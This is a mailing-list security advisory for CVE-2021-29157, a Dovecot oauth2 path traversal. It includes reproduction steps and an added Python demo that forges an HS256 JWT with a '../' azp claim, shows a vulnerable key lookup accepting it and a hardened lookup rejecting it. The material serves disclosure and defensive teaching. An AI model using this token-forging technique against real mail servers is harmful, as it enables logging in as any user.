oss-sec
mailing list archives
CVE-2021-29157: Dovecot oauth2 JWT local validation path traversal
From: Aki Tuomi <aki.tuomi () dovecot fi>
Date: Mon, 28 Jun 2021 09:58:23 +0300 (EEST)
Open-Xchange Security Advisory 2021-06-28
Affected product: Dovecot IMAP Server
Vendor: OX Software GmbH
Internal reference: DOP-2159
Vulnerability type: Path Traversal (CWE-24)
Vulnerable version: 2.3.11
Vulnerable component: oauth2
Report confidence: Confirmed
Solution status: Fixed in 2.3.15
Researcher credits: Kirin of Tencent Security Xuanwu Lab.
Vendor notification: 2021-03-22
CVE reference: CVE-2021-29157
CVSS: 6.7 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
Vulnerability Details:
If an attacker can write a file to the local filesystem, it is possible to trick Dovecot into using an attacker-specified key to
validate tokens.
Steps to reproduce:
Configure Dovecot to perform OAuth2 authentication with local JWT validation using the posix fs driver.
Place a base64-encoded HS256 shared key in a location that is readable by Dovecot, and use
../../../../../location/to/path as the key's azp.
You can now forge tokens and authenticate as any valid user.
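The following is an added example, not code from the advisory or from Dovecot, that models the reproduction steps above end to end: it forges an HS256 token whose azp claim is a traversal path, shows a key lookup that uses the azp/alg/kid values as path components as-is accepting the forged token, and shows a hardened lookup rejecting it. The key store layout of `<base>/<azp>/<alg>/<kid>`, the base directory name `dovecot-keys`, the defaults of `default` for a missing azp or kid, and the attacker-writable directory are assumptions for the demonstration; the key store, planted key and tokens are constructed inline in a temporary directory.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile
from typing import Optional


class KeyLookupError(Exception):
    """Raised when a token-supplied claim would select a key outside the key store."""


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_hs256_jwt(claims: dict, key: bytes, kid: str = "default") -> str:
    """Build an HS256-signed JWT; this is what the attacker does with the planted key."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT", "kid": kid}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def resolve_key_path_vulnerable(base: str, azp: str, alg: str, kid: str) -> str:
    # Token-supplied values are used as path components as-is, so an azp of
    # "../../..." walks out of the key store (the behaviour the advisory describes).
    return os.path.join(base, azp, alg, kid)


def resolve_key_path_hardened(base: str, azp: str, alg: str, kid: str) -> str:
    # Each component must be a single plain filename: no separators, no "." or "..".
    for component in (azp, alg, kid):
        if (not component or "/" in component or "\\" in component
                or "\x00" in component or component in (".", "..")):
            raise KeyLookupError(f"bad key path component: {component!r}")
    # Defence in depth: the resolved path must still lie inside the key store.
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, azp, alg, kid))
    if os.path.commonpath([root, path]) != root:
        raise KeyLookupError(f"key path escapes key store: {path}")
    return path


def load_key(path: str) -> bytes:
    # Keys are stored base64-encoded, as in the reproduction steps.
    with open(path) as fh:
        return base64.b64decode(fh.read().strip())


def validate_token(token: str, base: str, resolver) -> Optional[str]:
    """Return the token's subject if its HS256 signature verifies, else None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        claims = json.loads(b64url_decode(p))
        sig = b64url_decode(s)
    except ValueError:
        return None
    if header.get("alg") != "HS256":
        return None  # this example only models the HS256 shared-key case
    azp = claims.get("azp", "default")  # assumed defaults, not taken from the advisory
    kid = header.get("kid", "default")
    try:
        key = load_key(resolver(base, azp, header["alg"], kid))
    except (KeyLookupError, OSError):
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return claims.get("sub")


def demo() -> dict:
    """Constructed scenario: a legitimate key store plus an attacker-writable directory."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "dovecot-keys")  # assumed key store base directory
    os.makedirs(os.path.join(base, "default", "HS256"))
    real_key = os.urandom(32)
    with open(os.path.join(base, "default", "HS256", "default"), "w") as fh:
        fh.write(base64.b64encode(real_key).decode())

    evil_dir = os.path.join(root, "tmp", "evil")  # stands in for a world-writable location
    os.makedirs(os.path.join(evil_dir, "HS256"))
    attacker_key = b"attacker-controlled-secret"
    with open(os.path.join(evil_dir, "HS256", "default"), "w") as fh:
        fh.write(base64.b64encode(attacker_key).decode())

    # azp "../tmp/evil": <base>/<azp>/HS256/default now lands on the planted key.
    traversal_azp = os.path.relpath(evil_dir, base)
    forged = make_hs256_jwt({"sub": "victim@example.com", "azp": traversal_azp}, attacker_key)
    legit = make_hs256_jwt({"sub": "alice@example.com", "azp": "default"}, real_key)
    return {
        "forged_vulnerable": validate_token(forged, base, resolve_key_path_vulnerable),
        "forged_hardened": validate_token(forged, base, resolve_key_path_hardened),
        "legit_hardened": validate_token(legit, base, resolve_key_path_hardened),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened resolver applies two independent checks: a per-component allow-rule (a component is a single filename, nothing else), and a containment check on the resolved real path, so that a gap in the first rule on some platform still cannot select a file outside the key store. Note that the forged token is a perfectly valid HS256 JWT; the only thing wrong with it is where the verifier was told to find the key.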
Risk:
An attacker can gain access using forged credentials.
Solution:
Upgrade to the fixed version (2.3.15).